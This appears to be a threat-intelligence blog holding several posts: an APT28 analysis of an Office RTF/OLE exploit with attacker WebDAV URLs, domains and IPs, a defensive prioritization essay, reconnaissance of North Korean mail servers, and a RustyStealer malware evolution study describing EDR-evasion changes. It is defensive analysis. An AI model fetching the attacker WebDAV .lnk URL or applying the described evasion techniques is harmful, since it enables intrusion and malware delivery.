Since the beginning of this year, we have again observed an increased number of attacks by APT28 targeting various European countries. In multiple campaigns, the group actively leverages the Microsoft Office vulnerability CVE-2026-21509 as an initial access vector.
This article focuses on how CVE-2026-21509 is used in practice, how relevant IOCs can be extracted efficiently from weaponized Word documents and how the actors own geofencing can be leveraged to infer operational target regions.
Before diving into the analysis, a brief look at CVE-2026-21509 itself.
Understanding CVE-2026-21509 (Click)
CVE-2026-21509 is a Microsoft Office vulnerability affecting how embedded OLE objects are validated during document processing. Microsoft classifies it as a security feature bypass, which is accurate, but undersells the actual problem. Office makes trust decisions based on internal object metadata that originates directly from the document itself. The vulnerability does not rely on macros, scripts or external templates, it is triggered during normal parsing of specially crafted RTF documents. From a user perspective, the document appears inert. There are no prompts, no warnings and nothing that would suggest active content. The exploit uses RTF control words such as \object and \objdata to embed raw binary data inside the document. During parsing, Word reconstructs this data into in-memory OLE structures, effectively rebuilding Composite File Binary objects on the fly. This reconstruction step is where the vulnerability is exposed. The reconstructed OLE objects are deliberately malformed. Their headers look plausible, but their internal structure is inconsistent. Strict parsers reject them. Word does not. It continues processing and enters code paths that assume a coherent internal state. Observed samples frequently use OLE Package objects and legacy COM class identifiers associated with historically risky components. By manipulating how these objects are represented internally, Office checks meant to block them are bypassed, not by disabling protections, but by misleading the logic that decides whether those protections apply. The document itself contains no payload. Its sole purpose is to reach a state where Office processes an object it should not trust. Any follow-on activity happens later and outside the document. This separation between exploit and payload fits well with current intrusion chains.
From a defensive POV, this explains why CVE-2026-21509 is easy to miss. Static analysis shows no macros, no external relationships and no obvious indicators. The malicious structures only exist after Word reconstructs them, which places the exploit below the visibility of most document scanning and macro-focused controls.
tldr;
CVE-2026-21509 is a Microsoft Office vulnerability that allows attackers to bypass internal security checks when Word processes embedded OLE objects. The issue is triggered during normal document parsing and does not rely on macros, scripts or external content. A specially crafted RTF document embeds malformed OLE objects that Word reconstructs in memory. Office then makes security decisions based on this reconstructed data, even though it originates from the untrusted document. By manipulating that data, an attacker can cause Word to accept and process objects that should normally be blocked.
The document itself contains no payload and appears harmless under static analysis. Exploitation happens entirely inside Words parsing and object handling logic, below the level where most document scanners operate.
Analyzed Samples
For this analysis, I looked at the following samples:
When I receive potentially malicious Word documents, my first step is usually to run oleid. In most common malicious documents, this already reveals macros, external references or other active content.
In this case, oleid reports a clean file. No macros, no external relationships, no obvious indicators.
This is expected.
The document is not a classic OLE container but an RTF file. In RTF, embedded objects are stored as hexadecimal data inside the document body using control words such as \object and \objdata. These objects do not exist as real OLE structures until Word parses the document and reconstructs them in memory.
oleid operates at the container level. It can only detect features that already exist as structured objects in the file. Since the embedded OLE data is still plain text at this stage, there is nothing for oleid to flag.
The exploit surface of CVE-2026-21509 only becomes visible after this reconstruction step. Tools like rtfobj replicate this part of WordS parsing logic by extracting and rebuilding the embedded objects from the RTF stream.
rtfobj -s all b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546.doc
Once reconstructed, the embedded objects are clearly malformed. They resemble OLE containers but fail validation by strict parsers, which is exactly the condition the vulnerability relies on.
After extracting the embedded objects, I inspected the resulting files using xxd. At this stage, strings did not yield anything particularly useful, which is not surprising given that the document is not designed to carry a readable payload.
From this data, the following strings could be extracted:
Paths like file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.lnk?init=1 are chosen to force specific Windows and Office code paths.
Using file:// changes how Office interprets the access. The resource is treated as a file system object, not as web content. This affects which security checks are applied and how trust is evaluated. Mark-of-the-Web handling and web-centric protections do not apply in the same way as they would for http or https. The davwwwroot path forces WebDAV. This causes Windows to access the resource via the WebClient service, exposing the remote content as a network-like file system. WebDAV remains a special case in Windows, where remote files are often handled similarly to local or SMB resources. The .lnk file is the actual target. The Word document contains no payload and performs no execution itself. Its sole purpose is to reach a state where access to the remote resource is allowed. Shortcut files are attractive because they can execute commands or load further components while being subject to different checks than executables or scripts, especially when accessed through WebDAV. The query parameter is client-side only. It is used to avoid caching and to reliably trigger initial access behavior. It has no functional relevance for the server. In the context of CVE-2026-21509, this fits cleanly. The vulnerability causes Office to make incorrect trust decisions during document parsing. Once that decision is made, accessing a remote shortcut via a file:// WebDAV path becomes possible without macros, scripts or explicit downloads.
Identifying Targets
While analyzing the documents and extracted URLs, it became apparent that they reference potential target regions:
/cz/ -> Czech Republic
/buch/ -> Bucharest / Romania
/pol/ -> Poland
Additional indicators inside the Word documents further support this assessment:
Romanian language content
References to Ukraine
Mentions of Slovenia
EU-related context
None of this is accidental.
At this point, the next step is validation. Russian threat actors are known to rely heavily on geofencing and APT28 is no exception. Fortunately, this behavior can be turned into a useful source of intelligence for us ^-^
Turning Geofencing into Intelligence
The first step was to take a closer look at the domains extracted from the samples:
wellnessmedcare.org
193.187.148.169
freefoodaid.com
159.253.120.2
What stands out here is the choice of hosting locations. Both IP addresses resolve to providers in Romania and Moldova. It is reasonable to assume that these locations were selected based on the campaigns intended target regions.
Next, I attempted to replicate the WebDAV requests generated by Windows in order to test the observed geofencing behavior. To do this, I executed the document in a sandbox and captured the resulting network traffic.
Geofence Analysis
To validate the geofencing, I needed to determine which proxy locations were required to access the malicious resources without being blocked. After identifying suitable proxies, I performed test requests using a custom script, once without a proxy and once using a Romanian proxy.
Without proxy:
With proxy:
The result is fairly clear. Requests originating from outside the expected regions are rejected with HTTP 403, while requests routed through a Romanian proxy succeed. This pattern can be used to validate likely operational target regions.
Out of 114 tested countries, only three were allowed access: Czech Republic, Poland and Romania. This aligns perfectly with the indicators observed earlier in the documents and URLs.
As this example shows, defensive measures such as geofencing can provide valuable intelligence when analyzed properly. Even access control mechanisms can leak information about an actors operational focus if you know where to look. The second domain, freefoodaid.com, was already offline at the time of analysis. Given how short-lived APT28 infrastructure tends to be, this is hardly surprising. It is reasonable to assume that similar geofencing behavior would have been observable there as well, but for demonstration purposes, the remaining data is more than sufficient.
How to protect against these attacks
Update Microsoft Office and enforce a structured update routine. Treat unexpected Word documents as untrusted and have them analyzed before opening them. (or stop using windows :3)
Conclusion
CVE-2026-21509 works because it fits neatly into how Office processes documents today. The exploit relies on internal object reconstruction, not on macros or embedded payloads, which makes it easy to overlook during initial analysis. The surrounding tradecraft follows a familiar pattern. WebDAV paths, remote shortcut files and strict geofencing have been used by APT28 before and continue to show up in current campaigns. The technique is stable, requires little user interaction and avoids most of the controls that organizations typically rely on. At the same time, this setup exposes useful signals. Geofencing decisions, hosting locations and access behavior provide insight into intended target regions when tested systematically. In this case, the infrastructure behavior aligns closely with the indicators found inside the documents.
From an analytical perspective, the value lies less in the exploit itself and more in what can be inferred from how it is deployed and constrained.
Much of my previous work has focused on understanding threat actors not through individual malware samples alone, but through infrastructure, operational behavior, and strategic intent. Over time, a recurring problem became increasingly difficult to ignore:
While our visibility into attacker tradecraft continues to improve, our ability to decide what to defend first often does not.
Most security frameworks excel at describing what exists, techniques, controls, and best practices, but remain largely silent on what should matter most when resources are limited or when a specific threat actor becomes relevant. Instead of introducing another generic framework, this article applies an actor-centric prioritization methodology focused on attacker intent and impact. This approach emerged from a practical need I repeatedly encountered: organizations often had technically sound controls in place, yet still failed to prevent strategic loss, because their defensive investments were misaligned with the attackers actual objectives.
Why ACDP Was Developed
Actor-Centric Defensive Prioritization (ACDP) was developed to address a persistent gap between threat intelligence and defensive decision-making.
Threat intelligence typically answers questions such as:
Who is active?
What techniques are being used?
Defensive planning, however, must answer differnt questions:
What failure would be unacceptable?
Which controls meaningfully disrupt this actors strategy?
In real world environments, especially those facing state-aligned or destructive actors, it is rarely feasible to implement every recommended control simultaneously. Prioritization becomes inevitable.
ACDP exists to make that prioritization explicit, defensible, and actor-aware.
What Makes This Approach Different
ACDP does not attempt to replace established frameworks such as MITRE ATT&CK or NIST. Instead, it operates one level above them, using their outputs as inputs.
Its defining characteristic is a deliberate shift in perspective:
from technique coverage to strategic disruption
from static maturity models to adaptive decision-making
from generic best practices to context-driven trade-offs
The result is a reasoned ordering of defensive actions, based on how much they interfere with an adversary intent and how much damage they prevent if that interference fails.
Advantages of an Actor-Centric Approach
The strengths of ACDP are primarily practical:
ACDP enables rapid reprioritization when threat actor relevance changes
It aligns defensive investment with attacker objectives instead of abstract risk scores
It acknowledges budget and operational constraints instead of assuming ideal conditions
It helps explain why certain controls take priority, a critical factor in both technical and executive discussions
Most importantly: ACDP encourages organizations to think in terms of losing conditions, not only detection coverage
Limitations and Trade-Offs
ACDP is not without drawbacks.
Because it is actor-centric, its effectiveness depends on the quality of the underlying threat intelligence. Incorrect assumptions about attacker intent can lead to misplaced priorities. Additionally, ACDP does not provide prescriptive control definitions or implementation guidance. It assumes foundational security hygiene already exists and focuses solely on ordering, not designing, defensive measures. Finally, ACDP deliberately avoids the comfort of exhaustive coverage. It forces uncomfortable decisions, choosing what not to prioritize, which may challenge existing security narratives.
A Practical Motivation
The motivation behind ACDP is operational necessity
In environments where time, budget, and certainty are constrained, security decisions must be made before all information is available. ACDP provides a structured way to make those decisions without pretending that all risks are equal.
If defensive priorities do not change when attacker intent changes, prioritization is no longer strategic
ACDP in Practice: Quantified Prioritization Example
This section demonstrates how ACDP produces concrete priorities, using a scoring example against Sandworm.
Step 0: Define the Objective Profile
Based on historical and current operations, Sandworm is modeled as a:
Destructive, state-aligned actor prioritizing strategic impact over access longevity
This assumption directly influences weighting.
Step 1: Define the Scoring Axes
Each defensive control is evaluated across four axes.
Axis A: Actor Disruption Value (ADV)
How strongly does this control interfere with the actors campaign strategy?
Score
Meaning
5
Breaks or invalidates the strategy
4
Forces significant tradecraft change
3
Causes friction
2
Minor inconvenience
1
Negligible effect
Axis B: Impact Risk Reduction (IRR)
How much real damage does this control prevent if the actor succeeds elsewhere?
Score
Meaning
5
Prevents catastrophic / irreversible impact
4
Strongly limits blast radius
3
Partial damage reduction
2
Minimal reduction
1
Cosmetic
Axis C: Cost & Operational Complexity (CC)
How realistic is implementation under time and budget pressure?
Score
Meaning
5
Low cost, low friction
4
Moderate effort
3
Manageable complexity
2
High effort
1
Very expensive / disruptive
Axis D: Detection-to-Decision Time (DDT)
Does this control provide usable signal early enough to change outcomes?
Score
Meaning
5
Immediate / pre-impact
4
Early warning
3
Delayed but actionable
2
Mostly reactive
1
Post-incident only
Step 2: Actor-Specific Weighting
For a destructive actor, impact prevention and strategic disruption dominate:
This is basically the mathematical expression of attacker intent.
Why the Calculation Matters
Without explicit scoring:
prioritization becomes opinion
decisions become political
trade offs remain implicit
ACDP forces those trade-offs into the open.
If you cannot explain your priorities numerically, you are not prioritizing: you are rationalizing
Closing Thoughts
Often times security failures are caused not by missing controls, but by misaligned priorities. ACDP was developed to address this misalignment by shifting the focus from technique coverage to attacker intent, and from abstract risk to tangible impact. Its value lies in deliberate selection. Used correctly, ACDP does not replace existing frameworks, but sharpens them by forcing uncomfortable but necessary decisions. This methodology is intentionally opinionated!
If you have any feedback or questions, please feel free to contact me by email. I welcome criticism and feedback!
Today I stumbled over a rather accidental finding during a routine analysis of North Korean infrastructure that I would like to share with you. Since North Korea does not exactly use the internet for legitimate purposes and is well known for a long history of attacks against (critical) infrastructure, I consider it reasonable to treat essentially all North Korean internet-facing infrastructure as a threat entity by default. Infrastructure changes often reveal far more about a threat actor than individual malware samples ever will and the same applies to nation states like North Korea. That is precisely why this infrastructure deserves continuous observation.
For clarity: no offensive actions were performed during this analysis. Everything shown here is based exclusively on publicly accessible data and very basic reconnaissance. Even if the target happens to be North Korean infrastructure, operating within legal boundaries remains mandatory. Germany unfortunately does not always make this easy, but whatever.
Enough about that. Let’s get into the analysis.
Initial Discovery
Due to a historic DNS leak, we currently have a surprisingly large collection of publicly reachable websites hosted inside North Korea. I scanned these sites for email addresses because I was curious about the current state of their mail infrastructure. I had looked into this years ago but lost track of it over time. Back then, heavy geofencing was common and many services were blocked outright, so the obvious question was whether this still applies today (it does not)
For this quick assessment, I focused on two sites:
The domain appears to be used purely for identity, not routing
According to WHOIS (if we trust it), the domain was registered in 2025 via juming.com, a registrar I would generously describe as “economically efficient” rather than reputable.
Beyond that, there is essentially no public footprint for this domain.
Inference
There appears to be a deliberate separation between:
Routing identity:.kp domains
Cryptographic identity:.cc domain
Imo, this is a deliberate architectural decision and not an accident
Private State PKI (StarJV Certificate Authority)
Observations
Custom internal CA visible in the certificate
Not publicly trusted
Self-managed
Extremely primitive X.509 v1 structure
Inference
Active internal PKI operation
Low compliance and security maturity
No external trust anchor available or desired
X.509 Version 1 Certificate
Observations
Certificate is Version 1 (no extensions, no SAN, no policy constraints)
Inference
Outdated or minimal PKI toolchain
No modern security modeling
Functionality prioritized over governance
Primitive Serial Number (0x1000)
Observations
Serial number equals exactly 4096
Inference
Manual or simplistic CA automation
No randomness
Likely very small PKI scale
Multi-Identity on a Single Host
Observations
PTR: ryongnamsan.edu.kp
SMTP banner: star-co.net.kp
TLS CN: mail.nisp.cc
Inference
Central gateway role
Multi-tenant usage
Organizational consolidation
No MX Records for nisp.cc
Observations
Domain exists, but has no mail routing
Inference
Domain serves exclusively as an identity anchor
No end-user mail usage
Reduced abuse exposure
Extremely Large Mail Size (~10 GB)
Observations
SMTP SIZE = 10,000,000,000 bytes
Honestly, I laughed out loud when I saw this.
This configuration seems consistently on both active Star-CO SMTP servers (smtp and smtp1.star-co.net.kp), which looks like this is intentional rather than a misconfiguration. In contrast, the Silibank mail server uses a much more reasonable limit of ~100 MB. It is therefore reasonable to assume that these mail servers are being used to transfer very large files. In theory, this could even serve as a transport channel for bulk data movement, including data returning from North Korean remote workers abroad. This remains speculative, but the transport capacity itself is undeniable.
If you want to make yourself vulnerable to a denial-of-service attack, you should implement this feature yourself!
Inference
Expectation of large payload transfers
SMTP likely used as a general-purpose transport channel
No restrictive transport policies
Legacy Features Enabled (VRFY, ETRN)
Observations
User verification enabled
Legacy store-and-forward mechanisms active
Inference
Weak hardening discipline
Legacy configuration not cleaned up
Reliance on network isolation as primary security model
Unknown SMTP Extension (BBBBBBBB)
Observations
Non-standard SMTP extension
Inference
Bug, custom patch, or QA deficiency
Poor implementation hygiene
Recent Activity (Domain 2025 / Certificate 2024)
Observations
Domain registered recently
Certificate relatively fresh
Inference
Active modernization or reorganization
Not a purely legacy environment
Temporal Correlation & Strategic Context
We do not perform this kind of analysis purely for entertainment value. The objective is to generate intelligence that may become operationally relevant over time. That means we also need to ask why these infrastructure changes occurred when they did.
Based on available timestamps:
Certificate issuance: 23 Nov 2024
Domain registration: 21 Aug 2025
November 2024: Certificate Issuance
This period coincides with a phase of increased North Korean geopolitical activity:
Formalization of a comprehensive strategic partnership with Russia
Ongoing missile testing and military signaling
Escalating rhetoric toward South Korea, the US, and Japan
Partial reopening of diplomatic channels post-pandemic
Interpretation
The certificate appears to have been issued ahead of this intensified phase. A plausible explanation is preparatory technical groundwork, stabilizing externally reachable infrastructure before increased international activity or visibility
August 2025: Domain Registration
In this period we saw:
Continued military demonstrations
Publicized return of North Korean personnel from Russia
Increased diplomatic engagement with Russia and China
Rising international visibility
There is no single triggering political event on this exact date. However, the broader trend shows increased outward-facing engagement.
Interpretation
Registering an externally usable domain such as nisp.cc may reflect a desire to make services more reliably reachable and interoperable internationally during a phase of expanding external activity.
Possible Infrastructure Bridging Function
Even without explicit political announcements, infrastructure often moves first.
It is entirely plausible that North Korea:
began improving external visibility of selected services
equipped gateways with internationally compatible identities
prepared controlled external access paths for future operational needs
Such changes rarely happen accidentally in centralized environments.
Final Thoughts: Why This Matters
Threat intelligence too often focuses narrowly on malware families, campaigns, and short-lived indicators of compromise. When dealing with nation states, this Much of todays threat intelligence still revolves around malware samples, campaign names, and short-lived indicators. That perspective is fundamentally insufficient when dealing with nation states. States themselves act as long-term threat actors. Their infrastructure evolves far more slowly than malware and when it does change, it usually means someone made a deliberate decision, signed off on a budget, and probably sat through far too many internal meetings.
Infrastructure artifacts quietly expose things most actors would rather not advertise:
organizational maturity (or the lack thereof)
centralization models
operational priorities
capacity planning assumptions
risk tolerance
and governance culture
A single TLS certificate, a misaligned identity domain, or an absurdly permissive transport policy can easily reveal more about an actors operational reality than dozens of shiny malware samples ever could. Sometimes the most valuable intelligence comes from reading what a system accidentally tells you about itself. This small case demonstrates how even boring protocol metadata can function as durable intelligence signals when correlated properly. Observing infrastructure drift across threat actors or states allows us to detect strategic movement long before it becomes visible in campaigns, headlines, or incident reports. And as a small bonus observation: while geopolitical ambition clearly scales, PKI maturity and configuration hygiene appear to lag slightly behind. Infrastructure may evolve governance apparently takes its time ^-^
As already mentioned in my last MuddyWater article, I originally planned to take a closer look at the remaining RustyWater samples in the hope of finding additional leftover artefacts. But: writing a pure “let’s grep a few more binaries for leftovers” follow-up article sounded painfully boring, both to read and to write. So instead of doing that, I decided to version the individual samples properly and build a small change-tracking timeline around them.
Mostly out of curiosity, partly out of stubbornness. At least this way we get something that resembles actual analysis rather than archaeological string hunting.
Before diving into version diffs and timelines, it’s worth briefly grounding what we’re actually dealing with here, without turning this into a full-blown reverse engineering novella.
RustyStealer (sometimes referenced as RustyWater, Archer RAT or related variants in public reporting) is a Rust-based information stealer / RAT that has been observed in MuddyWater-attributed campaigns. In practice it behaves like a fairly typical post-compromise implant: basic host reconnaissance, security product awareness, persistence via registry, C2 communication and modular task execution. Nothing magical, nothing revolutionary, just a modernized tooling stack implemented in Rust instead of the usual C/C++ ecosystem. Here’s an article from cloudseek.com if you are interested in the details of it’s deliver and execution nature.
And that’s exactly where this article deliberately does not go: this is not a line-by-line teardown of every decoding routine, syscall wrapper or math loop. There are already reports on the internet that lovingly explain how a single function increments a counter.
What I’m interested in instead is how this thing evolves over time and how to track it
How do the binaries change between builds? Which libs appear or disappear? When does the architecture shift? Where do experiments get rolled back? Which parts get hardened, obfuscated or simplified?
The goal is to treat this malware family more like a software project with a messy commit history than a static artifact. By correlating compile timestamps, dependency fingerprints, fuzzy hashes, embedded artefacts and targeted code diffs, we can reconstruct a surprisingly coherent development timeline and extract signals about tooling maturity, experimentation phases and operational priorities .
And honestly: that’s way more fun than grepping strings all day and more useful for my threat actor research
My First Step: I always start with the most low-effort signal: raw strings. Sometimes you get lucky and developers leave behind absolute paths, usernames, toolchain artefacts or other accidental breadcrumbs.
The first thing I wanted to verify was whether any additional user paths were embedded in the samples:
for x in *.exe; do strings "$x" | r="$(strings "$x" | grep 'C:')"; if ! [ -z "$r" ]; then echo "$x $r\n"; fi ; done
And yes, in two of the binaries we do indeed find another leftover artefact:
C:\Users\Bruno\Desktop\art.exe
C:\Users\Jacob\...
Just to be clear: the developer is almost certainly not named Bruno/Jacob. This is simply the username of the build environment used at that time. Still, it gives us a nice anchor point when correlating samples later on.
Dependency extraction and library fingerprinting:
Next, I wanted to extract the dependency information from the binaries:
# get llvm strings
for x in *.exe; do strings "$x" | r="$(strings "$x" | grep 'llvm')"; if ! [ -z "$r" ]; then echo "$x $r\n"; fi ; done
# get crates with version and write to file sample.exe.strings
for x in *.exe; do strings "$x" | grep "crates\.io-" | cut -d'\' -f5 | sort | uniq >> "$x.strings" ; done
This gives us a list of Rust crates and libraries that were present at build time:
From this output I consolidated a full list of all dependencies observed across all samples. It already allows a first sanity check: are all samples built from the same dependency set or do we see deviations?
In total, the consolidated list contains 50 libraries, however, each individual sample only exposes around 44-45 crates. That already tells us that not all builds are identical.
Here is the full list of observed libraries:
Library
Version
aead
0.5.2
aes
0.8.4
aes-gcm
0.10.3
atomic-waker
1.1.2
base64
0.22.1
bytes
1.10.1
cipher
0.4.4
ctr
0.9.2
futures-channel
0.3.31
futures-core
0.3.31
futures-util
0.3.31
generic-array
0.14.7
h2
0.4.12
hashbrown
0.15.5
http
1.3.1
httpparse
1.10.1
http-body-util
1.7.0
hyper
1.7.0
hyper-tls
0.6.0
hyper-utils
0.1.16
icu_collections
2.0.0
icu_normalizer
2.0.0
idna
1.1.10
indexmap
2.11.0
ipnet
2.11.0
iri-string
0.7.8
mio
1.0.4
native-tls
0.2.14
percent-encoding
2.3.2
rand
0.6.5
rand_core
0.4.2
rand_hc
0.1.0
rand_jitter
0.1.4
reqwest
0.12.23
schannel
0.1.27
slab
0.4.11
smallvec
1.15.1
socket2
0.6.0
tokio
1.47.1
tokio-native-tls
0.3.1
tokio-util
0.7.16
tower
0.5.2
universal-hash
0.5.1
url
2.5.7
utf8_iter
1.0.4
want
0.3.1
windows-registry
0.5.3
winreg
0.55.0
rustc-demangle
0.1.24
rustc-demangle
0.1.26
Since we now know that differences exist, I built a per-sample matrix to visualize which libraries appear in which binary:
This makes deviations immediately visible without having to manually diff text dumps.
Compile timestamps
Before grouping anything, I also checked when the individual binaries were compiled.
This can be extracted using:
for x in *.exe; do printf "$x"; objdump -x "$x" | grep "Time/Date"; don
As a final preprocessing step I generated TLSH hashes for all samples.
TLSH is a fuzzy hashing algorithm that does not aim for exact equality, but instead quantifies structural similarity between files. Unlike cryptographic hashes, TLSH allows us to estimate how closely two binaries resemble each other internally even if they differ in resources, padding, timestamps or small code changes.
For our malware analysis purpose, this is especially useful when clustering variants, detecting rebuilds and separating development branches.
To make the distances reproducible, I wrote a small script that computes TLSH values directly from the binaries and performs pairwise comparisons:
Clustering the samples
With all of this data available, we can now perform a reasonably robust clustering of the samples
The key point here is that no single metric is deciding on its own. Instead, the correlation of multiple independent signals matters:
TLSH similarity
Compile timestamps
Library fingerprints
Embedded user artefacts
Cluster 1: Core codebase
The first cluster represents the actual core of the codebase and contains the samples:
All three share identical lib dependencies and are compiled close together in time, two of them even share the exact same compile timestamp. One sample also contains the user artefact "Bruno", which further hints to a consistent build environment.
Despite moderate TLSH distance to some variants, the internal similarity inside this cluster remains high enough to confidently assume a shared codebase.
Cluster 2: Early feature branch
A second, clearly separable cluster consists solely of:
This sample extends the otherwise stable library stack with an additional winreg dependency while remaining TLSH-close to the core samples. Combined with its earlier compile timestamp, i think this a temporary feature branch or experiment rather than a fully independent development line.
The build differs by multiple additional libraries and introduces a newer version of rustc-demangle. Additionally, a different username ("Jacob") appears in the artefacts. While the TLSH distance still places this sample within the same family, it consistently sits outside the tighter core cluster range. Taken together, this strongly indicates a later development branch with an updated toolchain and likely expanded functionality
Overall, this results in a three-tier model:
A stable core cluster forming the technical baseline
An early feature branch with minimal extension
A later modernization branch with a changed toolchain and build environment
My clustering is not driven by hash similarity alone, but only becomes reliable through the combined temporal, structural and artefact based corelation. It also provides insight into development practices, build discipline and potential role separation within the development process of the malware
Version mapping
Based on this clustering, I derived the following version mapping:
At this point we already have a solid structural overview without having touched the actual code yet. This part comes next.
For the code comparison I use Ghidras Version Tracking module. The versions will be analyzed in the following pairs:
v0.9 <-> v1.0
v1.0 <-> v1.1
v1.1 <-> v2.0
So three comparisons in total which honestly is still a very manageable workload
Let’s get started 🙂
Version Tracking workflow
I won’t go into a full tutorial on how Ghidras Version Tracking works. Instead, I’ll briefly outline my simple workflow for today.
First, I set the confidence filter to:
-1.0 -> 0.950
Everything above that can usually be assumed identical across samples. I select all those findings and accept them in bulk.
For the remaining findings, I set up a small quality-of-life shortcut:
SHIFT + T = Assign Tag
Then I filter the results by:
Tag (ascending)
Type (ascending)
Status (ascending)
and tighten the confidence filter slightly to:
-1.0 → 0.95
This gives me a clean view of all unresolved function-level differences without assigned tags, exactly the changes that matter most when identifying structural evolution.
It looks roughly like this:
The workflow is simple:
Select the next finding
Open code comparison (SHIFT + C)
If identical -> accept (SHIFT + A)
If different -> assign a tag for later analysis (SHIFT + T)
Once accepted or tagged, the finding disappears from the filtered view and I repeat the process.
I iterate this until all relevant changes are reviewed and documented.
RustyStealer: Evolution from v0.9 to v2.0
What changed, what failed and what the developer learned
During a longitudinal analysis of multiple RustyStealer builds, four development stages become visible for me: an early baseline version (v0.9), a cleanup iteration (v1.0), a short-lived performance refactor (v1.1) and a more fundamental architectural shift in v2.0.
Rather than showing linear feature growth, the samples show a realistic iterative engineering process with experimentation, rollback and eventual consolidation toward stealth and reliability.
This analysis focuses on behavioral deltas inferred from import-level changes and binary artifacts.
Version 0.9: Early baseline and rough edges
The earliest observed build (v0.9) represents a relatively raw implementation.
Notable characteristics:
Dependency artifacts included unused crates such as winreg / windows-registry ( i guess early experimentation or leftover scaffolding)
No meaningful behavioral differences compared to later v1.0 builds
No advanced memory manipulation or cryptographic primitives observed
Limited internal abstraction and minimal architectural complexity
From a development POV, v0.9 looks like a staging build that still contained residual dependencies and experimental code paths that were not yet cleaned up.
Version 1.0: Cleanup and stabilization
The transition from v0.9 to v1.0 did not introduce meaningful functional changes. The most visible difference was the removal of unused dependency artifacts (such as the winreg crate) without any observable change in imports or runtime behavior.
This looks more like a dependency cleanup rather than a behavioral refactor
Key observations:
No changes in imported Windows APIs
No observable change in capabilities or execution flow
Binary differences consistent with rebuild noise and dependency graph cleanup
This phase reflects basic project hygiene rather than feature development.
Version 1.1: Performance experiment and internal refactor
Version 1.1 marks the first technically ambitious change
Major changes observed:
Introduction of asynchronous and overlapped file I/O:
Migration to modern Windows path resolution via SHGetKnownFolderPath.
Explicit memory cleanup for shell APIs using CoTaskMemFree.
Removal of host fingerprinting:
GetComputerNameExW
GetUserNameW
NetGetJoinInformation
This version appears to have attempted:
Faster and more scalable file harvesting.
Cleaner filesystem abstraction.
Reduced behavioral noise by temporarily disabling host profiling.
However, asynchronous I/O pipelines significantly increase complexity and often cause instability in realworld environments This version looks more like a technical experiment rather than a long term production design for me
Additional findings from later code diffs
Looking at later builds and comparing them back to this branch reveals several important follow-up changes that appear to originate from the 1.1 refactor.
String handling and Defender artefacts
Older builds still expose cleartext strings such as direct Windows Defender directory paths, making static detection trivial. In later builds these strings disappear entirely and are reconstructed at runtime using multiple XOR-based decoding routines and different key constants.
I believe the outcome of the 1.1 refactor was the realization that static strings were becoming a liability, leading to systematic runtime string decryption in subsequent versions.
Collection handling and stability
Later builds include additional safety checks when aggregating dynamic collections (explicit overflow protection when joining result sets) The same logic exists in earlier builds but is less defensive and less structured.
This points to stability issues encountered when processing larger data sets, which maybe were discovered during or shortly after the scalability experiments introduced in version 1.1.
Modular architecture continuity
Both older and newer builds continue to reference internal Rust modules such as:
src\modules\persist.rs
src\modules\interface.rs
src\modules\information.rs
src\modules\detect_av.rs
It confirms that the internal refactor in 1.1 successfully established a modular layout that later versions could iterate on without further structural changes.
Toolchain and build artefacts
Later samples expose more Rust toolchain artefacts (stable-x86_64 paths and related metadata) and show noticeable hash divergence despite similar functionality. This looks like a change in compiler version or build environment after this refactor phase, which may also explain subtle behavioral and binary layout differences between closely related samples.
My take
Version 1.1 looks like the point where the developers started stress testing their own architecture.
They might have pushed performance and concurrency, simplified some noisy host profiling and cleaned up API usage. The follow-up changes visible in later diffs show that this experiment exposed two main pain points:
Static strings and predictable artefacts were too easy to signature.
Increased scale and concurrency exposed stability issues in collection handling.
Instead of doubling down on complex async I/O, later versions appear to focus more on obfuscation, robustness and operational reliability, while keeping the modular structure introduced here.
imo 1.1 feels less like a production release and more like a learning phase that shaped the technical direction of everything that followed.
Version 2.0: Architectural consolidation and stealth optimization
Version 2.0 represents a clear update in development priorities.
Instead of further expanding the async pipeline, the developer reverted many of the experimental components and focused on stealth, operational control and internal maturity.
Major changes observed:
Removal of asynchronous file pipeline
All overlapped I/O and event-based sync primitives present in v1.1 have been fully removed in v2.0 and later builds. No replacement async scheduling mechanisms (IOCP, APCs, worker pools or deferred execution patterns) are observable in the call graph.
The runtime execution flow is now strictly sequential, with simplified synchronization primitives replacing the earlier concurrency model. It looks like the experimental async pipeline was abandoned in favor of a more predictable and operationally stable execution model. It reduces architectural complexity, lowers race condition risk and improves long-term stability across victim environments. All overlapped I/O and event-based synchronization APIs were removed, indicating that the v1.1 experiment was abandoned in favor of a simpler and more predictable execution model.
Reintroduction of host fingerprinting
Host identification APIs returned:
GetComputerNameExW
GetUserNameW
NetGetJoinInformation
Focus on victim profiling, campaign correlation and backend attribution logic The temporary removal in v1.1 now appears to have been an experimental privacy / noise reduction phase rather than a permanent design direction.
Migration towards native NT APIs
Several subsystems were migrated towards native system calls:
Named pipes moved from CreateNamedPipeW to NtCreateNamedPipeFile
File handling introduced NtOpenFile
This reduces visibility to user-mode API hooking and increases resistance against common EDR userland instrumentation.
Introduction of cryptographic randomness and entropy hardening
Version 2.0 introduces a dedicated entropy generation pipeline based on SystemFunction036 (RtlGenRandom), replacing the previously implicit and largely deterministic behavior.
Rather than simply requesting random bytes, the implementation builds a full entropy pool that combines cryptographically secure randomness with adaptive jitter-based sampling and internal quality validation. The generated entropy is statistically evaluated at runtime and rejected if it fails basic stability and distribution thresholds. Only entropy that passes these health checks is propagated further into the execution flow.
The call chain shows that the generated randomness directly feeds into subsequent runtime decoding routines, where multiple obfuscated data blocks are reconstructed through XOR-based transformations and dynamic key. In earlier versions, these decode paths relied almost entirely on static constants and predictable transformations. In v2.0, parts of this process become entropy-dependent and therefore non-deterministic across executions
From an operational perspective this has several implications:
Runtime decoding behavior becomes less reproducible for static analysis and sandbox instrumentation.
Signature-based detection and clustering become more fragile, as internal state and derived values differ per execution.
Correlation across samples using hash similarity, instruction-level signatures or deterministic unpacking pipelines becomes significantly harder.
The malware gains a higher degree of resilience against emulation environments with weak or manipulated entropy sources.
While the mechanism could theoretically support use cases such as object naming, session identifiers or cryptographic material, the integration into the decode pipeline indicates more that the primary motivation is obfuscation hardening and stealth rather than feature expansion
It marks a shift in development priorities: the developers invest in making existing functionality harder to observe, reproduce and classify
Memory protection manipulation (VirtualProtect)
VirtualProtect appears in v2.0, but not as a generic “unpacking” indicator.
It is used to flip a read-only dispatch table to writable just long enough to store dynamically resolved API pointers, then lock it back down. Thats consistent with the shift towards runtime API resolving and NT-level calls: fewer static imports, less signature surface and a resolver layer that is harder to tamper with or trivial hook
Internal synchronization refactor
Thread state handling was refactored away from TLS primitives and migrated towards modern synchronization APIs (InitializeCriticalSectionEx)
